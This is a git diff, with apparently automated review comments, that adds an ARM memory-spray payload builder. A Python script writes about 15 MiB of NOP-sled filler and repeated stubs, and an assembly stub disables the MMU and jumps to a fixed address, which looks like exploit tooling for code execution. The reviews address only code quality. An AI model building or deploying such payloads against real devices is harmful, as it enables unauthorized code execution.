diff --git a/x1/Makefile b/x1/Makefile index 792b07d..c51b080 100644 --- a/x1/Makefile +++ b/x1/Makefile @@ -7,7 +7,7 @@ all: return.bin mrc.bin c/main.bin .PHONY: clean: - @rm -f *.bin */*.bin + @rm -f *.bin spray/*.bin c/*.bin %.bin: %.S @$(AS) $< @@ -17,4 +17,12 @@ clean: c/main.bin: @$(CC) -nostdlib -static -fPIC -mcpu=cortex-a7 c/start.S c/main.c @./extract.py a.out $@ - #@rm -f a.out + @rm -f a.out + +spray/main.bin: + @$(AS) spray/top.S + @./extract.py -p a.out spray/top.bin + @$(AS) spray/bottom.S + @./extract.py -p a.out spray/bottom.bin + @./append_nop.py 15728640 spray/top.bin spray/bottom.bin spray/main.bin + @rm -f a.out diff --git a/x1/append_nop.py b/x1/append_nop.py new file mode 100755 index 0000000..bdfa73e --- /dev/null +++ b/x1/append_nop.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python3 + +import sys + + +def main(): + if len(sys.argv) < 5: + print(f'Usage: {sys.argv[0]} N top.bin bottom.bin out.bin', file=sys.stderr) + sys.exit(1) + + with open(sys.argv[2], 'rb') as topf, open(sys.argv[3], 'rb') as bottomf, open(sys.argv[4], 'wb') as out: + top, bottom = topf.read(), bottomf.read() + out.write(top) + for i in range((1024 * 64 - len(top) - len(bottom)) // 4): + out.write(b'\x00\x00\xa0\xe1') + out.write(bottom) + + for i in range(1024 * 1024 * 15 // (1024 * 64) - 1): + for i in range((1024 * 64 - len(bottom)) // 4): + out.write(b'\x00\x00\xa0\xe1') + out.write(bottom) + + +main() diff --git a/x1/extract.py b/x1/extract.py index b6b3d27..8432ceb 100755 --- a/x1/extract.py +++ b/x1/extract.py @@ -9,7 +9,7 @@ def main(): print(f'Usage: {sys.argv[0]} in.elf out.bin') sys.exit(1) - with open(sys.argv[1], 'rb') as f: + with open(sys.argv[-2], 'rb') as f: extract(ELFFile(f)) 
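Review bot: The new `spray/main.bin` target in the second Makefile hunk has no prerequisites, so make never rebuilds it when `spray/top.S`, `spray/bottom.S` or `append_nop.py` change, and it is not listed in `all`, so a plain `make` skips it. Declaring the inputs, `spray/main.bin: spray/top.S spray/bottom.S append_nop.py extract.py`, gives it the same staleness tracking the `%.bin: %.S` pattern rule already provides for the other targets. Both this recipe and the `c/main.bin` recipe above it write and delete the same `a.out` in the working directory, so a parallel build (`make -j`) can have one recipe extract or delete the other's object. The magic number `15728640` passed to `append_nop.py` would read better as a documented variable, e.g. `SPRAY_SIZE = 15728640 # 15 MiB`, which is the same value the script currently hard-codes as `1024 * 1024 * 15`.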
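Review bot: The size argument `N` in `append_nop.py` is checked for presence but never read — the outer loop count is hard-coded as `1024 * 1024 * 15 // (1024 * 64) - 1`, so the value the Makefile passes has no effect and any other value is silently ignored; reading it, `size = int(sys.argv[1])`, and using `size // (1024 * 64) - 1` as the outer range would make the usage line true. The first filler range, `(1024 * 64 - len(top) - len(bottom)) // 4`, goes negative without error if the two inputs together exceed one 64 KiB block, producing a silently short file; a guard such as `if len(top) + len(bottom) > 1024 * 64: sys.exit('top.bin and bottom.bin exceed one 64 KiB block')` fails loudly instead. The four-byte filler written with one `out.write` per iteration would be clearer and far faster as a module constant written once per block, `out.write(NOP * count)` with `NOP = b'\x00\x00\xa0\xe1'` commented as the ARM `mov r0, r0` encoding. Both nested loops bind `i` and neither uses it, so the loop variable should be `_`, and the block size `1024 * 64` repeated three times deserves a named constant.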
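Review bot: The usage message printed just above the changed `open` in `extract.py` still reads `in.elf out.bin`, but the commit now accepts an optional `-p` flag and takes the input from `sys.argv[-2]`, so the help text no longer describes the interface; it should read `print(f'Usage: {sys.argv[0]} [-p] in.elf out.bin')`. Reading the two files from the end of argv is an implicit convention that the `-p` lookup in the next hunk depends on; a comment above the `open`, `# input and output are always the last two arguments; an optional -p may precede them`, records it, and `argparse` would make it explicit. `main` starts above the hunk.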
@@ -19,10 +19,14 @@ def extract(elf): print('Input ELF has no .text section', file=sys.stderr) sys.exit(1) - with open(sys.argv[2], 'wb') as f: - elf.stream.seek(0) - elf.stream.read(text.header.sh_offset) - f.write(elf.stream.read()) + with open(sys.argv[-1], 'wb') as f: + if '-p' in sys.argv: + print(f'Pure .text mode is enabled') + f.write(text.data()) + else: + elf.stream.seek(0) + elf.stream.read(text.header.sh_offset) + f.write(elf.stream.read()) print(f'Successfully extracted the necessary sections to "{sys.argv[2]}"') diff --git a/x1/spray/bottom.S b/x1/spray/bottom.S new file mode 100644 index 0000000..ac76cb4 --- /dev/null +++ b/x1/spray/bottom.S @@ -0,0 +1,9 @@ +.text + .align 2 + .global _start + +_start: +loop: + b loop + ldr r0, =0x00000000 + mov pc, r0 diff --git a/x1/spray/top.S b/x1/spray/top.S new file mode 100644 index 0000000..9efdb23 --- /dev/null +++ b/x1/spray/top.S @@ -0,0 +1,16 @@ +.text + .align 2 + .global _start + +_start: + mov r9, #0 + ldr r0, =0x67800000 + + mrc p15, 0, r10, c1, c0, 0 + bic r10, r10, #1 @ disable MMU and dcache + @bic r10, r10, #4096 @ disable icache + mcr p15, 0, r10, c1, c0, 0 // write ctrl regs + #mcr p15, 0, r9, c7, c7, 0 // invalidate cache + #mcr p15, 0, r9, c8, c7, 0 // invalidate TLB + mov pc, r0 +
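Review bot: The success message on this hunk's last context line still prints `sys.argv[2]`, but the output file is now opened from `sys.argv[-1]`; when `-p` is given, as the Makefile does for `spray/top.bin`, argv[2] is the input ELF (`a.out`), so the message names the wrong file. It should use the same index as the `open`: `print(f'Successfully extracted the necessary sections to "{sys.argv[-1]}"')`. `print(f'Pure .text mode is enabled')` has no placeholders and should be a plain string, and it would help a reader to say what the mode means — only the bytes of the `.text` section are written, whereas the default branch seeks to the `.text` file offset and copies everything from there to end of file. `extract` starts above the hunk.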
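Review bot: The two instructions after `b loop` in `spray/bottom.S` are unreachable, since `loop: b loop` branches to itself unconditionally, so the `ldr r0, =0x00000000` and `mov pc, r0` are either leftovers from an earlier version or a deliberate placeholder, and the file does not say which. Either drop them or add a comment above `loop:` such as `@ spin forever; the ldr/mov below are never executed`, so the next reader does not look for a path to them. If the trailing instructions are kept only to fix the size of the emitted block, say that too, since nothing in the file makes it evident.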
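Review bot: The comment on `bic r10, r10, #1` in `spray/top.S` says `disable MMU and dcache`, but the instruction clears only bit 0 of the control register, which is the MMU enable; the data-cache enable is a separate bit that this line leaves untouched, so the comment overstates what the code does and should read `@ clear bit 0: disable MMU`. The file mixes three comment styles (`@`, `//` and `#` at the start of a line); GNU as for ARM accepts all of them, but one style, `@`, would be consistent and avoids `#` being read as an immediate prefix. `mov r9, #0` only feeds the two commented-out `mcr` lines, so it is dead code unless those are restored; the commented-out lines should be removed or given a comment explaining why they are kept, and the hard-coded `0x67800000` needs a comment stating what it is assumed to be.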